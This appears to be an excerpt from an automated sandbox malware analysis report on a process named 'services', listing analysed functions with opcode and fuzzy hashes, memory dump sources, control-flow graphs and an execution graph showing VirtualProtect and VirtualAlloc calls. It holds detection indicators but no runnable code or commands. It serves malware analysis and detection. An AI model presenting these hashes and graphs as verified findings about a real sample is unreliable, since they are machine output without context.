                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dfd8cd8bc4b44cc5ad294ac82f7e6bb4c0071abf78f6b8a651f1fb2f4e77b82b
                                                                                                                                • Instruction ID: 53d8fafc41feae25c1b24a9d683f3ec2c611d0489520930a79b0cf682f779293
                                                                                                                                • Opcode Fuzzy Hash: dfd8cd8bc4b44cc5ad294ac82f7e6bb4c0071abf78f6b8a651f1fb2f4e77b82b
                                                                                                                                • Instruction Fuzzy Hash: 85D0C968B1F98F95F9394EC1823023925E15F80B00E62063EE85F498E2CD1E7701A201
                                                                                                                                Function 00007FFD9BFE4075 Relevance: .0, Instructions: 9COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cc8adb999e1b85d2e365de92cc0ac90185c6e4e4e5772a910a7b49549f07e749
                                                                                                                                • Instruction ID: 1678344f90dbc4051425780342c2be4f9e838e2ba8ed33a60ddca2d2654b77ca
                                                                                                                                • Opcode Fuzzy Hash: cc8adb999e1b85d2e365de92cc0ac90185c6e4e4e5772a910a7b49549f07e749
                                                                                                                                • Instruction Fuzzy Hash: 29C08C302084018FCB94EF10C018C203390EF6934032602B4C607DF2B0CB21ED00CB50
                                                                                                                                Function 00007FFD9BFED12F Relevance: .0, Instructions: 8COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 940593a5637956a4b0d2926aad72b4ec614f8416016d2e22dc7bc3036a23ceca
                                                                                                                                • Instruction ID: c62f4ee28092d3a2effef5d1c29b1374fdaa7cb038ea246c999f35d58284f484
                                                                                                                                • Opcode Fuzzy Hash: 940593a5637956a4b0d2926aad72b4ec614f8416016d2e22dc7bc3036a23ceca
                                                                                                                                • Instruction Fuzzy Hash: 16C09B44F0F3475FF73155F005B107C07410F97200B570675D106899F3DC4D6A455316
                                                                                                                                Function 00007FFD9BFE2011 Relevance: .0, Instructions: 7COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a9c14c060ae014c0c00cd9b7bd6ed492767da3c6d2a26a0af38e1376e31f36a0
                                                                                                                                • Instruction ID: 8b0d8e3bfe5787794b698ed929dc21fd5b6a61d365fd11a006e0d8ad461efaa8
                                                                                                                                • Opcode Fuzzy Hash: a9c14c060ae014c0c00cd9b7bd6ed492767da3c6d2a26a0af38e1376e31f36a0
                                                                                                                                • Instruction Fuzzy Hash: 76B01200F1D80D16D4A06DC5102037D10C34BC41007214039800DC1195CD1C6E066142
                                                                                                                                Function 00007FFD9BFE5451 Relevance: .0, Instructions: 6COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3073735560.00007FFD9BFE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFE0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9bfe0000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c6c65d2c13ef1fb2109b3618da15bc38b4e2719c7855517b7fd9be0c422b90ef
                                                                                                                                • Instruction ID: 23b80a80950a3e05fec328e50810307629f2d1940edda1a4450a1d691b6c6004
                                                                                                                                • Opcode Fuzzy Hash: c6c65d2c13ef1fb2109b3618da15bc38b4e2719c7855517b7fd9be0c422b90ef
                                                                                                                                • Instruction Fuzzy Hash: 5DB00200F6E20FD7F53514F4487517D01510B45245A960F35D51F451E3EDDD3B405161

                                                                                                                                Non-executed Functions

                                                                                                                                Function 00007FFD9B9414D0 Relevance: .1, Instructions: 68COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000010.00000002.3047304272.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_16_2_7ffd9b940000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: aae5d5e282823e22484205302ececb5aff0e73f3649af109a9cb7515f55128d2
                                                                                                                                • Instruction ID: 0d56f19e5344728b99fb3009fae6fcfee642db4bc0f201a06d6e1b0a01e471a2
                                                                                                                                • Opcode Fuzzy Hash: aae5d5e282823e22484205302ececb5aff0e73f3649af109a9cb7515f55128d2
                                                                                                                                • Instruction Fuzzy Hash: 2C11303192D7CE5FDB16DB6488215D97FB0EF02200F0982E7D059C72E3DA38A644C751

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:4.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:6
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 14026 7ffd9b7a295e 14027 7ffd9b7a296d VirtualProtect 14026->14027 14029 7ffd9b7a2aad 14027->14029 14030 7ffd9b7a434d 14031 7ffd9b7a436f VirtualAlloc 14030->14031 14033 7ffd9b7a4485 14031->14033

                                                                                                                                Executed Functions

                                                                                                                                Function 00007FFD9B7D594F Relevance: 1.7, Strings: 1, Instructions: 461COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 7ffd9b7d594f-7ffd9b7d599a 1 7ffd9b7d599c-7ffd9b7d59a1 0->1 2 7ffd9b7d59a4-7ffd9b7d59ad 0->2 1->2 3 7ffd9b7d5e5b-7ffd9b7d5e61 2->3 4 7ffd9b7d5e67-7ffd9b7d5e80 3->4 5 7ffd9b7d59b2-7ffd9b7d59dc 3->5 6 7ffd9b7d59e3-7ffd9b7d59fc 5->6 7 7ffd9b7d59de 5->7 8 7ffd9b7d5a03-7ffd9b7d5a1d 6->8 9 7ffd9b7d59fe 6->9 7->6 11 7ffd9b7d5a24-7ffd9b7d5a3c 8->11 12 7ffd9b7d5a1f 8->12 9->8 13 7ffd9b7d5a43-7ffd9b7d5a64 11->13 14 7ffd9b7d5a3e 11->14 12->11 15 7ffd9b7d5a66-7ffd9b7d5a6a 13->15 16 7ffd9b7d5ad2-7ffd9b7d5aef 13->16 14->13 15->16 19 7ffd9b7d5a6c-7ffd9b7d5a80 15->19 17 7ffd9b7d5af6-7ffd9b7d5b0f 16->17 18 7ffd9b7d5af1 16->18 20 7ffd9b7d5b16-7ffd9b7d5b30 17->20 21 7ffd9b7d5b11 17->21 18->17 22 7ffd9b7d5ac4-7ffd9b7d5aca 19->22 23 7ffd9b7d5b37-7ffd9b7d5b4f 20->23 24 7ffd9b7d5b32 20->24 21->20 25 7ffd9b7d5acc-7ffd9b7d5acd 22->25 26 7ffd9b7d5a82-7ffd9b7d5a86 22->26 29 7ffd9b7d5b56-7ffd9b7d5b60 23->29 30 7ffd9b7d5b51 23->30 24->23 31 7ffd9b7d5b63-7ffd9b7d5baf 25->31 27 7ffd9b7d5a88-7ffd9b7d5a8e 26->27 28 7ffd9b7d5a91-7ffd9b7d5aa7 26->28 27->28 32 7ffd9b7d5aa9 28->32 33 7ffd9b7d5aae-7ffd9b7d5ac1 28->33 29->31 30->29 34 7ffd9b7d5bb1-7ffd9b7d5bc1 31->34 35 7ffd9b7d5bc4-7ffd9b7d5c5b 31->35 32->33 33->22 34->35 36 7ffd9b7d5c65-7ffd9b7d5d38 35->36 37 7ffd9b7d5c5d-7ffd9b7d5c62 35->37 39 7ffd9b7d5d3a-7ffd9b7d5d3e 36->39 40 7ffd9b7d5dab-7ffd9b7d5dc2 36->40 37->36 39->40 41 7ffd9b7d5d40-7ffd9b7d5d4f 39->41 42 7ffd9b7d5dc9-7ffd9b7d5de3 40->42 43 7ffd9b7d5dc4 40->43 46 7ffd9b7d5d9d-7ffd9b7d5da3 41->46 44 7ffd9b7d5dea-7ffd9b7d5e0e 42->44 45 7ffd9b7d5de5 42->45 43->42 47 7ffd9b7d5e15-7ffd9b7d5e39 44->47 48 7ffd9b7d5e10 44->48 45->44 49 7ffd9b7d5da5-7ffd9b7d5da6 46->49 50 7ffd9b7d5d51-7ffd9b7d5d55 46->50 53 7ffd9b7d5e3b 47->53 54 7ffd9b7d5e40-7ffd9b7d5e51 47->54 48->47 55 7ffd9b7d5e53-7ffd9b7d5e58 49->55 51 7ffd9b7d5d69-7ffd9b7d5d7a 50->51 52 7ffd9b7d5d57-7ffd9b7d5d66 50->52 56 7ffd9b7d5d7c 51->56 57 7ffd9b7d5d81-7ffd9b7d5d9a 51->57 52->51 53->54 54->55 55->3 56->57 57->46
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7D3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D3000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7d3000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ikP.
                                                                                                                                • API String ID: 0-1166349263
                                                                                                                                • Opcode ID: 1b1728cbd4041daca68b7cf45d7614ec039fb02aa6fb345bd30e79f10f05d528
                                                                                                                                • Instruction ID: d384ca525188a496a748ccc47bd49de3a460e71f732f1450554662e0bd862907
                                                                                                                                • Opcode Fuzzy Hash: 1b1728cbd4041daca68b7cf45d7614ec039fb02aa6fb345bd30e79f10f05d528
                                                                                                                                • Instruction Fuzzy Hash: F9120770E0461D8FDB18DFA8C495AECBBF1FF88340F248669D41AEB255DA34A985CF50
                                                                                                                                Function 00007FFD9B7AB0DD Relevance: 1.3, Instructions: 1265COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 84 7ffd9b7ab0dd-7ffd9b7ab0ed 85 7ffd9b7ab0ef 84->85 86 7ffd9b7ab0f4-7ffd9b7aca87 call 7ffd9b7adc96 84->86 85->86 91 7ffd9b7aca89-7ffd9b7aca97 86->91 92 7ffd9b7acaa2-7ffd9b7acb49 91->92 98 7ffd9b7acc56-7ffd9b7accae 92->98 99 7ffd9b7acb4f-7ffd9b7acb66 92->99 110 7ffd9b7ace45-7ffd9b7acf21 98->110 111 7ffd9b7accb4-7ffd9b7accff 98->111 102 7ffd9b7acb68-7ffd9b7acbae 99->102 103 7ffd9b7acbb2-7ffd9b7acc4d 99->103 102->103 103->98 131 7ffd9b7acc4f 103->131 144 7ffd9b7acf27-7ffd9b7ad000 110->144 145 7ffd9b7ad002-7ffd9b7ad048 110->145 121 7ffd9b7ace2c-7ffd9b7ace39 111->121 122 7ffd9b7ace3f-7ffd9b7ace40 121->122 123 7ffd9b7acd04-7ffd9b7acd12 121->123 125 7ffd9b7ad1fd-7ffd9b7ad25c 122->125 127 7ffd9b7acd19-7ffd9b7acd99 123->127 128 7ffd9b7acd14 123->128 142 7ffd9b7ad524-7ffd9b7ad551 125->142 140 7ffd9b7acd9b 127->140 141 7ffd9b7acda0-7ffd9b7ace1a 127->141 128->127 131->98 140->141 173 7ffd9b7ace1c-7ffd9b7ace21 141->173 174 7ffd9b7ace24-7ffd9b7ace29 141->174 150 7ffd9b7ad557-7ffd9b7ad57b call 7ffd9b7adcf9 142->150 151 7ffd9b7ad261-7ffd9b7ad29d 142->151 163 7ffd9b7ad04f-7ffd9b7ad055 144->163 145->163 170 7ffd9b7ad57d 150->170 171 7ffd9b7ad584-7ffd9b7ad5b8 150->171 160 7ffd9b7ad2ba-7ffd9b7ad521 151->160 161 7ffd9b7ad29f-7ffd9b7ad2b6 151->161 160->142 161->160 166 7ffd9b7ad1ea-7ffd9b7ad1f7 163->166 166->125 169 7ffd9b7ad05a-7ffd9b7ad068 166->169 175 7ffd9b7ad06a 169->175 176 7ffd9b7ad06f-7ffd9b7ad10f 169->176 170->171 182 7ffd9b7ad5d8-7ffd9b7ad5f5 171->182 183 7ffd9b7ad5ba-7ffd9b7ad5c7 171->183 173->174 174->121 175->176 212 7ffd9b7ad17f-7ffd9b7ad1a7 176->212 213 7ffd9b7ad111-7ffd9b7ad139 176->213 189 7ffd9b7ad5fb-7ffd9b7ad6f9 182->189 190 7ffd9b7ad7b4-7ffd9b7ad7b8 182->190 187 7ffd9b7ad5c9 183->187 188 7ffd9b7ad5ce-7ffd9b7ad5d6 183->188 187->188 188->182 189->190 246 7ffd9b7ad6ff-7ffd9b7ad70b 189->246 191 7ffd9b7adac7-7ffd9b7adb1f 190->191 192 7ffd9b7ad7be-7ffd9b7ad7c7 190->192 214 7ffd9b7adc87-7ffd9b7adc95 191->214 215 7ffd9b7adb25-7ffd9b7adbba 191->215 196 7ffd9b7ad7c9-7ffd9b7ad7ce 192->196 197 7ffd9b7ad7d1-7ffd9b7ad7da 192->197 196->197 201 7ffd9b7adab1-7ffd9b7adac1 197->201 201->191 203 7ffd9b7ad7df-7ffd9b7ad7f0 201->203 206 7ffd9b7ad7f7-7ffd9b7ad897 203->206 207 7ffd9b7ad7f2 203->207 240 7ffd9b7ad89d-7ffd9b7ad8fd 206->240 241 7ffd9b7adaa3-7ffd9b7adaab 206->241 207->206 222 7ffd9b7ad1a9 212->222 223 7ffd9b7ad1ae-7ffd9b7ad1d7 212->223 217 7ffd9b7ad13b 213->217 218 7ffd9b7ad140-7ffd9b7ad17d 213->218 215->214 245 7ffd9b7adbc0-7ffd9b7adbd1 215->245 217->218 230 7ffd9b7ad1e2-7ffd9b7ad1e7 218->230 222->223 223->230 230->166 254 7ffd9b7ad8ff 240->254 255 7ffd9b7ad904-7ffd9b7ad90d 240->255 241->201 248 7ffd9b7adbd8-7ffd9b7adc85 245->248 249 7ffd9b7adbd3 245->249 246->190 250 7ffd9b7ad711-7ffd9b7ad7a9 246->250 248->214 249->248 250->190 254->255 258 7ffd9b7ada7c-7ffd9b7ada8a 255->258 259 7ffd9b7ad913-7ffd9b7ad96b 255->259 263 7ffd9b7ada8c 258->263 264 7ffd9b7ada91-7ffd9b7ada99 258->264 271 7ffd9b7ad9f7-7ffd9b7ada25 259->271 272 7ffd9b7ad971-7ffd9b7ad99d 259->272 263->264 265 7ffd9b7ada9b-7ffd9b7adaa0 264->265 265->241 273 7ffd9b7ada27 271->273 274 7ffd9b7ada2c-7ffd9b7ada7a 271->274 275 7ffd9b7ad99f 272->275 276 7ffd9b7ad9a4-7ffd9b7ad9f2 272->276 273->274 274->265 275->276 276->265
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 14fe5241b1f5628229e98de3020d3b5f7d90d6216f01c7c827883e813a151c45
                                                                                                                                • Instruction ID: 5a8d4b3a449387e86de9b586bfba9c5a8cb372f56b588f89103c6998ae017ab1
                                                                                                                                • Opcode Fuzzy Hash: 14fe5241b1f5628229e98de3020d3b5f7d90d6216f01c7c827883e813a151c45
                                                                                                                                • Instruction Fuzzy Hash: 5AB2C270A0991D8FDFA4DB58C895BA9B7B1FF98301F1042E9D01DD72A5DA356E81CF40
                                                                                                                                Function 00007FFD9B7AC5A8 Relevance: .8, Instructions: 778COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 425 7ffd9b7ac5a8-7ffd9b7ac5e7 429 7ffd9b7aca47-7ffd9b7aca4d 425->429 430 7ffd9b7ac5ec-7ffd9b7ac68a 429->430 431 7ffd9b7aca53-7ffd9b7aca87 call 7ffd9b7adc96 429->431 444 7ffd9b7ac68c-7ffd9b7ac6af 430->444 445 7ffd9b7ac6ba-7ffd9b7ac6c9 430->445 441 7ffd9b7aca89-7ffd9b7aca97 431->441 443 7ffd9b7acaa2-7ffd9b7acb49 441->443 465 7ffd9b7acc56-7ffd9b7accae 443->465 466 7ffd9b7acb4f-7ffd9b7acb66 443->466 444->445 447 7ffd9b7ac6cb 445->447 448 7ffd9b7ac6d0-7ffd9b7ac6df 445->448 447->448 450 7ffd9b7ac6f4-7ffd9b7ac70f 448->450 451 7ffd9b7ac6e1-7ffd9b7ac6ef 448->451 452 7ffd9b7ac72f-7ffd9b7aca1b 450->452 453 7ffd9b7ac711-7ffd9b7ac72b 450->453 456 7ffd9b7aca26-7ffd9b7aca44 451->456 452->456 453->452 456->429 477 7ffd9b7ace45-7ffd9b7acf21 465->477 478 7ffd9b7accb4-7ffd9b7accff 465->478 469 7ffd9b7acb68-7ffd9b7acbae 466->469 470 7ffd9b7acbb2-7ffd9b7acc4d 466->470 469->470 470->465 498 7ffd9b7acc4f 470->498 511 7ffd9b7acf27-7ffd9b7ad000 477->511 512 7ffd9b7ad002-7ffd9b7ad048 477->512 488 7ffd9b7ace2c-7ffd9b7ace39 478->488 489 7ffd9b7ace3f-7ffd9b7ace40 488->489 490 7ffd9b7acd04-7ffd9b7acd12 488->490 492 7ffd9b7ad1fd-7ffd9b7ad25c 489->492 494 7ffd9b7acd19-7ffd9b7acd99 490->494 495 7ffd9b7acd14 490->495 509 7ffd9b7ad524-7ffd9b7ad551 492->509 507 7ffd9b7acd9b 494->507 508 7ffd9b7acda0-7ffd9b7ace1a 494->508 495->494 498->465 507->508 540 7ffd9b7ace1c-7ffd9b7ace21 508->540 541 7ffd9b7ace24-7ffd9b7ace29 508->541 517 7ffd9b7ad557-7ffd9b7ad57b call 7ffd9b7adcf9 509->517 518 7ffd9b7ad261-7ffd9b7ad29d 509->518 530 7ffd9b7ad04f-7ffd9b7ad055 511->530 512->530 537 7ffd9b7ad57d 517->537 538 7ffd9b7ad584-7ffd9b7ad5b8 517->538 527 7ffd9b7ad2ba-7ffd9b7ad521 518->527 528 7ffd9b7ad29f-7ffd9b7ad2b6 518->528 527->509 528->527 533 7ffd9b7ad1ea-7ffd9b7ad1f7 530->533 533->492 536 7ffd9b7ad05a-7ffd9b7ad068 533->536 542 7ffd9b7ad06a 536->542 543 7ffd9b7ad06f-7ffd9b7ad10f 536->543 537->538 549 7ffd9b7ad5d8-7ffd9b7ad5f5 538->549 550 7ffd9b7ad5ba-7ffd9b7ad5c7 538->550 540->541 541->488 542->543 579 7ffd9b7ad17f-7ffd9b7ad1a7 543->579 580 7ffd9b7ad111-7ffd9b7ad139 543->580 556 7ffd9b7ad5fb-7ffd9b7ad6f9 549->556 557 7ffd9b7ad7b4-7ffd9b7ad7b8 549->557 554 7ffd9b7ad5c9 550->554 555 7ffd9b7ad5ce-7ffd9b7ad5d6 550->555 554->555 555->549 556->557 613 7ffd9b7ad6ff-7ffd9b7ad70b 556->613 558 7ffd9b7adac7-7ffd9b7adb1f 557->558 559 7ffd9b7ad7be-7ffd9b7ad7c7 557->559 581 7ffd9b7adc87-7ffd9b7adc95 558->581 582 7ffd9b7adb25-7ffd9b7adbba 558->582 563 7ffd9b7ad7c9-7ffd9b7ad7ce 559->563 564 7ffd9b7ad7d1-7ffd9b7ad7da 559->564 563->564 568 7ffd9b7adab1-7ffd9b7adac1 564->568 568->558 570 7ffd9b7ad7df-7ffd9b7ad7f0 568->570 573 7ffd9b7ad7f7-7ffd9b7ad897 570->573 574 7ffd9b7ad7f2 570->574 607 7ffd9b7ad89d-7ffd9b7ad8fd 573->607 608 7ffd9b7adaa3-7ffd9b7adaab 573->608 574->573 589 7ffd9b7ad1a9 579->589 590 7ffd9b7ad1ae-7ffd9b7ad1d7 579->590 584 7ffd9b7ad13b 580->584 585 7ffd9b7ad140-7ffd9b7ad17d 580->585 582->581 612 7ffd9b7adbc0-7ffd9b7adbd1 582->612 584->585 597 7ffd9b7ad1e2-7ffd9b7ad1e7 585->597 589->590 590->597 597->533 621 7ffd9b7ad8ff 607->621 622 7ffd9b7ad904-7ffd9b7ad90d 607->622 608->568 615 7ffd9b7adbd8-7ffd9b7adc85 612->615 616 7ffd9b7adbd3 612->616 613->557 617 7ffd9b7ad711-7ffd9b7ad7a9 613->617 615->581 616->615 617->557 621->622 625 7ffd9b7ada7c-7ffd9b7ada8a 622->625 626 7ffd9b7ad913-7ffd9b7ad96b 622->626 630 7ffd9b7ada8c 625->630 631 7ffd9b7ada91-7ffd9b7ada99 625->631 638 7ffd9b7ad9f7-7ffd9b7ada25 626->638 639 7ffd9b7ad971-7ffd9b7ad99d 626->639 630->631 632 7ffd9b7ada9b-7ffd9b7adaa0 631->632 632->608 640 7ffd9b7ada27 638->640 641 7ffd9b7ada2c-7ffd9b7ada7a 638->641 642 7ffd9b7ad99f 639->642 643 7ffd9b7ad9a4-7ffd9b7ad9f2 639->643 640->641 641->632 642->643 643->632
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f6d68a0ac40bb35ae868a4d8439e3690ccefa5b5e88efa46c7cacd51152d8b0a
                                                                                                                                • Instruction ID: fe2ebb0811ee69f43f0cbb88d320d8048f09d00a7a062291b3513ea9123d4f10
                                                                                                                                • Opcode Fuzzy Hash: f6d68a0ac40bb35ae868a4d8439e3690ccefa5b5e88efa46c7cacd51152d8b0a
                                                                                                                                • Instruction Fuzzy Hash: 8062F071A09A1D8FDBA8DB58C865BA9B7B1FF98301F1042E9D00DD72A5DE356E81CF40
                                                                                                                                Function 00007FFD9B7AC84E Relevance: .7, Instructions: 721COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 648 7ffd9b7ac84e-7ffd9b7ac850 649 7ffd9b7ac8cc-7ffd9b7ac8de 648->649 650 7ffd9b7ac852-7ffd9b7ac879 648->650 652 7ffd9b7ac95b-7ffd9b7ac96f 649->652 653 7ffd9b7ac8e0-7ffd9b7ac907 649->653 650->649 655 7ffd9b7ac9c8-7ffd9b7ac9ce 652->655 653->652 657 7ffd9b7ac9d0-7ffd9b7ac9df 655->657 658 7ffd9b7ac971-7ffd9b7ac9ac 655->658 660 7ffd9b7aca0f-7ffd9b7aca1b 657->660 662 7ffd9b7ac9ae 658->662 663 7ffd9b7ac9b3-7ffd9b7ac9c5 658->663 664 7ffd9b7aca26-7ffd9b7aca4d 660->664 662->663 663->655 667 7ffd9b7ac5ec-7ffd9b7ac68a 664->667 668 7ffd9b7aca53-7ffd9b7aca87 call 7ffd9b7adc96 664->668 681 7ffd9b7ac68c-7ffd9b7ac6af 667->681 682 7ffd9b7ac6ba-7ffd9b7ac6c9 667->682 678 7ffd9b7aca89-7ffd9b7aca97 668->678 680 7ffd9b7acaa2-7ffd9b7acb49 678->680 699 7ffd9b7acc56-7ffd9b7accae 680->699 700 7ffd9b7acb4f-7ffd9b7acb66 680->700 681->682 684 7ffd9b7ac6cb 682->684 685 7ffd9b7ac6d0-7ffd9b7ac6df 682->685 684->685 687 7ffd9b7ac6f4-7ffd9b7ac70f 685->687 688 7ffd9b7ac6e1-7ffd9b7ac6ef 685->688 689 7ffd9b7ac72f-7ffd9b7aca04 687->689 690 7ffd9b7ac711-7ffd9b7ac72b 687->690 688->664 689->660 690->689 711 7ffd9b7ace45-7ffd9b7acf21 699->711 712 7ffd9b7accb4-7ffd9b7accff 699->712 703 7ffd9b7acb68-7ffd9b7acbae 700->703 704 7ffd9b7acbb2-7ffd9b7acc4d 700->704 703->704 704->699 732 7ffd9b7acc4f 704->732 745 7ffd9b7acf27-7ffd9b7ad000 711->745 746 7ffd9b7ad002-7ffd9b7ad048 711->746 722 7ffd9b7ace2c-7ffd9b7ace39 712->722 723 7ffd9b7ace3f-7ffd9b7ace40 722->723 724 7ffd9b7acd04-7ffd9b7acd12 722->724 726 7ffd9b7ad1fd-7ffd9b7ad25c 723->726 728 7ffd9b7acd19-7ffd9b7acd99 724->728 729 7ffd9b7acd14 724->729 743 7ffd9b7ad524-7ffd9b7ad551 726->743 741 7ffd9b7acd9b 728->741 742 7ffd9b7acda0-7ffd9b7ace1a 728->742 729->728 732->699 741->742 774 7ffd9b7ace1c-7ffd9b7ace21 742->774 775 7ffd9b7ace24-7ffd9b7ace29 742->775 751 7ffd9b7ad557-7ffd9b7ad57b call 7ffd9b7adcf9 743->751 752 7ffd9b7ad261-7ffd9b7ad29d 743->752 764 7ffd9b7ad04f-7ffd9b7ad055 745->764 746->764 771 7ffd9b7ad57d 751->771 772 7ffd9b7ad584-7ffd9b7ad5b8 751->772 761 7ffd9b7ad2ba-7ffd9b7ad521 752->761 762 7ffd9b7ad29f-7ffd9b7ad2b6 752->762 761->743 762->761 767 7ffd9b7ad1ea-7ffd9b7ad1f7 764->767 767->726 770 7ffd9b7ad05a-7ffd9b7ad068 767->770 776 7ffd9b7ad06a 770->776 777 7ffd9b7ad06f-7ffd9b7ad10f 770->777 771->772 783 7ffd9b7ad5d8-7ffd9b7ad5f5 772->783 784 7ffd9b7ad5ba-7ffd9b7ad5c7 772->784 774->775 775->722 776->777 813 7ffd9b7ad17f-7ffd9b7ad1a7 777->813 814 7ffd9b7ad111-7ffd9b7ad139 777->814 790 7ffd9b7ad5fb-7ffd9b7ad6f9 783->790 791 7ffd9b7ad7b4-7ffd9b7ad7b8 783->791 788 7ffd9b7ad5c9 784->788 789 7ffd9b7ad5ce-7ffd9b7ad5d6 784->789 788->789 789->783 790->791 847 7ffd9b7ad6ff-7ffd9b7ad70b 790->847 792 7ffd9b7adac7-7ffd9b7adb1f 791->792 793 7ffd9b7ad7be-7ffd9b7ad7c7 791->793 815 7ffd9b7adc87-7ffd9b7adc95 792->815 816 7ffd9b7adb25-7ffd9b7adbba 792->816 797 7ffd9b7ad7c9-7ffd9b7ad7ce 793->797 798 7ffd9b7ad7d1-7ffd9b7ad7da 793->798 797->798 802 7ffd9b7adab1-7ffd9b7adac1 798->802 802->792 804 7ffd9b7ad7df-7ffd9b7ad7f0 802->804 807 7ffd9b7ad7f7-7ffd9b7ad897 804->807 808 7ffd9b7ad7f2 804->808 841 7ffd9b7ad89d-7ffd9b7ad8fd 807->841 842 7ffd9b7adaa3-7ffd9b7adaab 807->842 808->807 823 7ffd9b7ad1a9 813->823 824 7ffd9b7ad1ae-7ffd9b7ad1d7 813->824 818 7ffd9b7ad13b 814->818 819 7ffd9b7ad140-7ffd9b7ad17d 814->819 816->815 846 7ffd9b7adbc0-7ffd9b7adbd1 816->846 818->819 831 7ffd9b7ad1e2-7ffd9b7ad1e7 819->831 823->824 824->831 831->767 855 7ffd9b7ad8ff 841->855 856 7ffd9b7ad904-7ffd9b7ad90d 841->856 842->802 849 7ffd9b7adbd8-7ffd9b7adc85 846->849 850 7ffd9b7adbd3 846->850 847->791 851 7ffd9b7ad711-7ffd9b7ad7a9 847->851 849->815 850->849 851->791 855->856 859 7ffd9b7ada7c-7ffd9b7ada8a 856->859 860 7ffd9b7ad913-7ffd9b7ad96b 856->860 864 7ffd9b7ada8c 859->864 865 7ffd9b7ada91-7ffd9b7ada99 859->865 872 7ffd9b7ad9f7-7ffd9b7ada25 860->872 873 7ffd9b7ad971-7ffd9b7ad99d 860->873 864->865 866 7ffd9b7ada9b-7ffd9b7adaa0 865->866 866->842 874 7ffd9b7ada27 872->874 875 7ffd9b7ada2c-7ffd9b7ada7a 872->875 876 7ffd9b7ad99f 873->876 877 7ffd9b7ad9a4-7ffd9b7ad9f2 873->877 874->875 875->866 876->877 877->866
                                                                                                                                Memory Dump Source
